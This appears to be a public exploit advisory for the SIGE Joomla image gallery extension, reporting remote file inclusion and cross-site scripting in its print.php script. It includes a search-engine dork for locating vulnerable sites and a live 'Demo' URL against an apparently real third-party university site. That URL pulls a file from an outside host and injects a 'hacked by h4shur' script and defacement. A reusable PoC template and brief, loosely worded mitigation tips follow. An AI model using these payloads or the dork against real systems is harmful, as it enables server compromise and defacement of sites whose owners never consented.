# Title: SIGE - Simple Image Gallery Extended joomla extension 3.4.1-FREE / 3.5.3-PRO - Multi Vulnerability Remote File Inclusion [RFI] & Cross Site Scripting [XSS] # date: 2020-11-11 # Vendor Homepage: https://kubik-rubik.de/ # Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended # Software Link: https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended # Software Link: https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ # Version : 3.4.1-FREE / 3.5.3-PRO # CWEs : CWE-98 / CWE-79 # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Powered by Simple Image Gallery Extended" intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de" ### Note: * Another web application bug is the RFI bug, which can be very dangerous And stands for Remote File Inclusion, which directly executes loose scripts on the server Also, this security hole is created by programmer errors And you must be fluent in programming language to secure and prevent this bug And you have to control the inputs of the application and use powerful firewalls * This bug is one of the most dangerous bugs and the access that the intruder can gain using this bug is the implementation of Shell script In fact, by running Shell script, it will have relatively complete access to the Target site server If we want to explain it in text, the hacker will execute the shell by giving a link from Shell script in txt format to the input of the vulnerable site. * what's the solution ? Check the file entered by the user from a list and enter it if the file was in the list. Example : * If you are a server administrator, turn off allow_url_fopen from the file. * Or do it with the ini_set command. Only for (RFI) * We can use the strpos command to check that if the address is: // http, the file will not be enclosed (it can only block RFI) * Using str_replace we can give the given address from two characters "/", "." Let's clean up. ### Xss Alert Code: "> '> '> And Etc. ### Demo : [+] http://med.mui.ac.ir/oldsite/plugins/content/sige/plugin_sige/print.php?img=http://cheryco.ir/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E ### Poc : [+] site.com/[folders]/print.php?img=[RFI] &name=[XSS] title=[XSS] ### Contact Me : * Email : h4shursec@gmail.com * twitter : @h4shur * Telegram : @h4shur * Instagram : @netedit0r